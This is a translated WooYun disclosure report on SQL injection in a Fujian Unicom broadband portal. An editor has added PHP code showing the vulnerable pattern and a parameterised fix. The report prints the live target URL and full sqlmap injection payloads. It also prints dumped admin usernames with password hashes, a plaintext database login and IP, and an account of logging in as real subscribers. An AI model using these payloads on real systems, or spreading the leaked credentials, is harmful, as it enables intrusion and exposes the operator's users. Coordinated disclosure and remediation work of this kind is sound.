
Vulnerability summary (24 following)

Defect ID: wooyun-2014-081692

Title: SQL injection in a China Unicom broadband digital-home website (leaks 1.14 million user records including account names and passwords)

Vendor: 中国联通 (China Unicom)

Author: 路人甲

Submitted: 2014-11-02 10:04

Fix time: 2014-12-17 10:06

Published: 2014-12-17 10:06

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-11-02: details sent to the vendor, awaiting vendor handling
2014-11-03: vendor confirmed; details visible to the vendor only
2014-11-13: details disclosed to core white hats and domain experts
2014-11-23: details disclosed to regular white hats
2014-12-03: details disclosed to intern white hats
2014-12-17: details disclosed to the public

Brief description:

That's right: not 110K, but 1.14 million!

Detailed description:

Site: http://fjportal.vcomlive.com/
The page footer says the site is
福建联通宽带数字家庭 (Fujian Unicom Broadband Digital Home), jointly operated by 河南网视传媒有限公司 and 郑州威科姆科技股份有限公司
Injection point:
Open any programme, for example http://fjportal.vcomlive.com/play/play.php?id=LBQG1120572
The id parameter is injectable.
sqlmap output:

sqlmap identified the following injection points with a total of 205 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=LBQG1120572' AND 6594=6594 AND 'vkEP'='vkEP
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=LBQG1120572' AND (SELECT 3565 FROM(SELECT COUNT(*),CONCAT(0x7162707971,(SELECT (CASE WHEN (3565=3565) THEN 1 ELSE 0 END)),0x7173637671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LXuR'='LXuR
Type: UNION query
Title: MySQL UNION query (NULL) - 60 columns
Payload: id=-6386' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162707971,0x6f6a724865474f786170,0x7173637671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: id=-8719' OR 5082=SLEEP(5) AND 'GCJr'='GCJr
---
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
current database: 'Portal'
current user is DBA: False
available databases [3]:
[*] information_schema
[*] Portal
[*] test
Database: Portal
[193 tables]


Now the row counts per table:



The subscriber table holds 1.14 million user records, and they include account names and passwords.

Database: Portal
Table: subscriber
[19 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| address | text |
| area_code | varchar(64) |
| business_id | int(11) |
| chargetype | varchar(64) |
| cl_type | int(11) |
| email | varchar(64) |
| end_time | varchar(16) |
| id | int(11) |
| locked | tinyint(1) |
| mobile | varchar(64) |
| name | varchar(64) |
| net_account | varchar(64) |
| net_type | int(11) |
| nickname | varchar(64) |
| password | varchar(255) |
| phone | varchar(32) |
| start_time | int(10) |
| tname | varchar(64) |
| update_flag | int(1) |
+-------------+--------------+


Pulled a few rows to look at.



Picked two users at random and logged in.

[Screenshot: 1.png]


[Screenshot: 3.png]


But after clicking through, the site reported an illegal IP.

[Screenshot: 2.png]


Perhaps accounts are bound to an IP?
Didn't figure it out, so didn't test further.
Then looked around some more.

Database: Portal
Table: userinfo
[4 entries]
+----+--------------+--------+---------+---------+----------+----------+----------------------------------+
| id | tele | is_sso | purview | address | username | truename | password |
+----+--------------+--------+---------+---------+----------+----------+----------------------------------+
| 1 | 0 | 0 | 15 | 0 | admin | admin | 88f10d639863b00bfc885ab1b88441a9 |
| 2 | 059138288288 | 0 | 15 | 福建办事处 | fjbsc | 福建办事处 | e9f6f0e31308c741c9a02867eabefd5a |
| 3 | 0 | 0 | 15 | <blank> | kwbksy | 高翔 | ce6f4aae92cf678e4204d7a737293401 |
| 9 | 156371 | 0 | 15 | <blank> | kw | 播控值班 | 5de19cdb3da2afdd14f0bd868f790b74 |
+----+--------------+--------+---------+---------+----------+----------+----------------------------------+


These look like back-end administrator accounts and passwords, but couldn't find the admin login URL, so gave up.
Finally also found the database configuration:

Database: Portal
Table: portal_status
[1 entry]
+---------+------------------+--------------+
| db_user | db_passwd | portal_ip |
+---------+------------------+--------------+
| content | content_19990908 | 58.22.63.202 |
+---------+------------------+--------------+


Then port-scanned IP 58.22.63.202 and found port 3306 open, so MySQL can be connected to remotely.

[Screenshot: 1115.jpg]


The whole database could be dumped directly!
I'll stop digging here; rank as you see fit.

Proof of vulnerability:

Fix recommendation:

Copyright notice: when republishing, please credit 路人甲@乌云
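The report leaves the fix section empty. As an added example (editor-supplied, not code from the report or from the site), here is the string-concatenation pattern that makes a play.php?id= lookup injectable, next to a hardened version that checks the id's shape and binds it as a query parameter. The table and column names and the assumed id format are illustrative.

```php
<?php
// Added example, not code from fjportal.vcomlive.com: the concatenation pattern
// behind an injectable play.php?id= lookup, beside a hardened replacement.
// Table and column names ("movies", "id", "name") are assumed for illustration.

// VULNERABLE: $id is spliced into the SQL text, so a value such as
// LBQG1120572' AND 6594=6594 AND 'vkEP'='vkEP becomes part of the statement.
function find_program_unsafe(PDO $db, $id) {
    $sql = "SELECT id, name FROM movies WHERE id = '" . $id . "'";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC) ?: null;
}

// HARDENED: reject anything not shaped like a programme id (format assumed
// from the single example in the report: letters followed by digits), then
// bind the value as a parameter so the database never parses it as SQL.
function find_program_safe(PDO $db, $id) {
    if (!is_string($id) || !preg_match('/^[A-Z]{2,8}[0-9]{4,12}$/', $id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM movies WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Demonstration on an in-memory SQLite database with constructed sample data
// (the real site runs MySQL; PDO's MySQL driver binds parameters the same way).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE movies (id TEXT PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO movies VALUES ('LBQG1120572', 'sample programme')");

// Boolean-blind probe taken from the sqlmap output above.
$probe = "LBQG1120572' AND 6594=6594 AND 'vkEP'='vkEP";
var_dump(find_program_unsafe($db, $probe));     // row returned: the injected AND ran as SQL
var_dump(find_program_safe($db, $probe));       // NULL: rejected before any SQL is built
var_dump(find_program_safe($db, 'LBQG1120572')); // the legitimate row
```

Run with php on a build that has pdo_sqlite. The report also shows the web application's database account could enumerate every table and that port 3306 was reachable from the internet, so a database account limited to the tables play.php actually needs, plus a firewall rule on 3306, would bound the impact of any injection that slips through.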


Vendor response

Vendor reply:

Severity: High

Vulnerability rank: 18

Confirmed at: 2014-11-03 11:29

Vendor comment:

Latest status:

None yet